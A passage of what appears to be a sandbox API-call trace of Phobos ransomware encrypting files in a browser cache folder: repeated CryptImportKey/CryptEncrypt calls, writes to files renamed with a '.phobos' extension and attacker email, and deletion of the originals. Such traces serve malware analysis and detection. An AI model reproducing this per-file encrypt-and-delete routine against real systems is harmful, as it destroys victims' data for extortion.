CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.599] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0176.599] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.599] CloseHandle (hObject=0x178) returned 1 [0176.599] CloseHandle (hObject=0x148) returned 1 [0176.600] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\chrome-new[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\chrome-new[1].jpg")) returned 1 [0176.604] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.609] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1969) returned 1 [0176.609] CloseHandle (hObject=0x148) returned 1 [0176.609] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js")) returned 0x2020 [0176.609] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.610] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.610] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.611] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.611] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.611] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7b1, lpOverlapped=0x0) returned 1 [0176.629] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0, dwBufLen=0x7c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0) returned 1 [0176.629] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7c0, lpOverlapped=0x0) returned 1 [0176.630] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0176.630] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.630] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0176.630] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.631] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0176.631] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.631] CloseHandle (hObject=0x148) returned 1 [0176.631] CloseHandle (hObject=0x178) returned 1 [0176.631] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[1].js")) returned 1 [0176.632] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.632] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1969) returned 1 [0176.632] CloseHandle (hObject=0x178) returned 1 [0176.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js")) returned 0x2020 [0176.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.633] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.633] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.633] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.633] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7b1, lpOverlapped=0x0) returned 1 [0176.643] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0, dwBufLen=0x7c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0) returned 1 [0176.643] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7c0, lpOverlapped=0x0) returned 1 [0176.644] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0176.644] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.644] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0176.644] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.644] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0176.644] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.644] CloseHandle (hObject=0x178) returned 1 [0176.645] CloseHandle (hObject=0x148) returned 1 [0176.645] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\ContainerTag[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\containertag[2].js")) returned 1 [0176.646] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.654] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=187) returned 1 [0176.654] CloseHandle (hObject=0x148) returned 1 [0176.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt")) returned 0x2020 [0176.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.654] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.654] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.655] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.655] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.655] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xbb, lpOverlapped=0x0) returned 1 [0176.656] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0176.656] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0176.657] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0176.657] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.657] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.657] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.657] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.657] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.657] CloseHandle (hObject=0x148) returned 1 [0176.657] CloseHandle (hObject=0x178) returned 1 [0176.657] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\css[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\css[2].txt")) returned 1 [0176.658] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.660] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0176.661] CloseHandle (hObject=0x178) returned 1 [0176.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini")) returned 0x2006 [0176.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.662] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.662] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.663] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.663] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.663] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0176.667] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0176.667] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0176.668] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0176.668] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.668] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.668] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.668] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.668] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.668] CloseHandle (hObject=0x178) returned 1 [0176.668] CloseHandle (hObject=0x148) returned 1 [0176.668] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\desktop.ini")) returned 1 [0176.669] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.676] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32632) returned 1 [0176.676] CloseHandle (hObject=0x148) returned 1 [0176.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg")) returned 0x2020 [0176.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\fallback_728x90[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.676] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.676] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\fallback_728x90[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 